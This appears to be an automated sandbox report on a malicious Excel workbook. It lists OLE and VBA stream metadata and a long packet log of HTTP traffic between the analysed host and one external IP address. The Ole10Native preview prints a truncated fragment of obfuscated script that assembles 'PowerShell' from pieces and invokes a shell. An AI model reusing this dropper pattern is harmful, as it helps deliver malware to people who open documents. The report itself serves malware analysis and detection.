                Stream Path:MBD0E02868F/\x1CompObj
                File Type:data
                Stream Size:76
                Entropy:3.093449526469053
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . 9 q . . . . . . . . . . . .
                General
                Stream Path:MBD0E02868F/\x1Ole10Native
                File Type:data
                Stream Size:1253
                Entropy:5.626025282516848
                Base64 Encoded:True
                Data ASCII:. . . . . s f o W Q . t x t . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D e s k t o p \\ E x c e l B u i l d e r \\ s f o W Q . t x t . . . . . X . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ { C 6 7 3 9 C D 9 - D A F E - 4 F 4 B - B 4 F 9 - 2 7 2 9 F 2 5 1 8 8 0 8 } \\ s f o W Q . t x t . . . . . v a r r = G e t O b j e c t ( e m r k d s f ( ) ) . . . . v a r y 7 e r 0 0 g g = " P o " + " w e r " + " s h " + " e l l " ; . . v a r y y = r . S h e
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:107404
                Entropy:6.916408952283569
                Base64 Encoded:True
                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . \\ . p . . . . A d m i n i s t r a t o r B . . . . a . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . V j 1 8 . . . . . . . X . @ . . . . . . . . . . " . . . . .
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:418
                Entropy:5.310189377634396
                Base64 Encoded:True
                Data ASCII:I D = " { 1 B 2 6 7 3 1 5 - 1 3 C 3 - 4 B D 3 - 8 3 7 E - 1 1 1 6 E E 3 9 B C 7 9 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 3 3 1 8 A D 9 B 9 D D B 9 D D B 9 D D B 9 D D " . . D P B = " 6 6 6 4 D F 2 E 2 1 5 2 5 5 5 3 5 5 5 3 5 5 " . . G C = " 9 9 9 B 2 0 5 5 2 1 5 5
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                File Type:data
                Stream Size:62
                Entropy:3.0554671543224337
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                File Type:data
                Stream Size:2787
                Entropy:4.334603289799577
                Base64 Encoded:False
                Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ .
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                File Type:data
                Stream Size:529
                Entropy:6.350368654088815
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . 0 J . . . H . . H . . " . . H . . . . d . . . . . . . V B A P r o j e c t . . . . . @ . . . . . = . . V . . r . . . . . . . . . @ 2 . e . . . . J < . . . . . . 9 s t d o . l e > . . s . t . . d . o . l . e . ( . . h . % ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ . W i n d o w s \\ . S y s W O W 6 4 . \\ . e 2 . t l b # . O L E A u t o m a t i o n . 0 . . A E O f f i c E O D . f . i . c E . . . E 2 D F 8 . D 0 4 C - 5 B F . A - 1 0 1 B - B H
                Timestamp    Source Port    Dest Port    Source IP    Dest IP
                Aug 26, 2022 00:13:23.084178925 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.084242105 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.084295988 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.084326982 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.084357977 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.085139036 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.085164070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.085207939 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.085436106 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.193799973 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.193833113 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.193850040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.193881035 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.193902016 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194081068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194101095 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194118977 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194135904 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194139957 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.194153070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194158077 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.194171906 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194188118 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194205999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194225073 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.194228888 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.194947958 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.194972992 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.195000887 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.195014000 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.195336103 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.303713083 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303749084 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303766966 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303790092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303841114 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303845882 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.303881884 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.303900957 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.303965092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304117918 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304195881 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304212093 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304250956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.304263115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.304265022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304317951 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304464102 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304471016 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.304636955 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304656029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304672956 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.304727077 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.304743052 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.413642883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413711071 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413728952 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.413742065 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413744926 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.413779020 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.413824081 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413867950 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413886070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413903952 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413921118 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413938046 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.413955927 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.414004087 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414021969 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.414040089 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414045095 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414066076 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414072037 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414076090 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.414117098 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.414129972 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414134026 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414153099 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414158106 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.414191008 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.415961981 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.416140079 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.416157961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.416172981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.416177034 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.416229963 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.416240931 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.416244984 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.523580074 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523637056 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523672104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523704052 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523777008 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523776054 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.523811102 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.523816109 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.523896933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523930073 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.523962975 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.523987055 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.524334908 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.525080919 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.525126934 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.525156975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.525188923 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.525736094 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.633054972 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.633111954 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.633146048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.633593082 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.633635044 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.633708954 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.633733988 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.635335922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.635405064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.635413885 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.635447979 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.635498047 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.635792971 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.742661953 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.742770910 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.743135929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.743851900 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.745110989 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.745201111 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.745727062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.745767117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.745798111 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.745835066 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.852530956 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.852665901 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.853598118 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.853812933 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.854793072 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.854842901 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.854945898 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.855489016 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.855556011 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.855572939 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.962296963 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.962780952 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.963459969 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.963502884 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.963581085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.963975906 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.964745998 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.964876890 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.964916945 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:23.964951038 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.964971066 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:23.964976072 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.049710989 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.049828053 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.160017967 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160084963 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160125971 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160166025 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160166979 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.160207033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160250902 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160274982 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.160295010 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160335064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.160399914 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.269872904 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.269927979 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.269968033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.270008087 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.270111084 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.270174026 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.270265102 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.270265102 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.270340919 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.270421028 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.270457983 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380213976 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380263090 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380311012 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380323887 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.380362988 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380393982 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.380414963 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380455017 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380491018 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.380507946 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.380583048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.380640984 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490330935 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490384102 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490436077 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.490612984 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490658045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490700960 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.490711927 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490780115 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490787983 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.490825891 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490869999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490895987 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.490917921 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.490992069 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600478888 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600527048 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600565910 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600583076 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600608110 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600647926 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600651026 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600691080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600730896 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600732088 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600860119 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600903988 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600909948 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.600945950 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.600985050 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.601010084 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.710966110 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711025000 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711039066 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711066961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711108923 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711110115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711150885 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711163998 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711189985 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711216927 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711230040 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711230993 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711271048 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711286068 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711321115 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711419106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711461067 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.711473942 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.711509943 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821609974 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821674109 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821715117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821755886 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821769953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821820021 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821822882 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821824074 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821826935 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821866035 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821868896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821909904 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821912050 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821950912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.821973085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.821990013 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.822030067 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.823461056 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.931772947 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931842089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931895018 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.931902885 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.931950092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932002068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932015896 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:24.932061911 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:24.932115078 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042335033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042357922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042375088 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042391062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042411089 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042428017 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042448044 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042457104 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.042505980 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.042560101 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152775049 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152815104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152837038 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152854919 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152859926 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152882099 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152899981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152905941 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152930975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.152950048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.152952909 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.153007030 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261147022 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261185884 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261212111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261239052 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261256933 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261269093 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261291981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261296034 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261324883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261352062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261359930 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.261379957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.261409998 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.370843887 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.370912075 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.370928049 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:25.370978117 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:25.371021986 CEST8049174209.127.20.13192.168.2.22
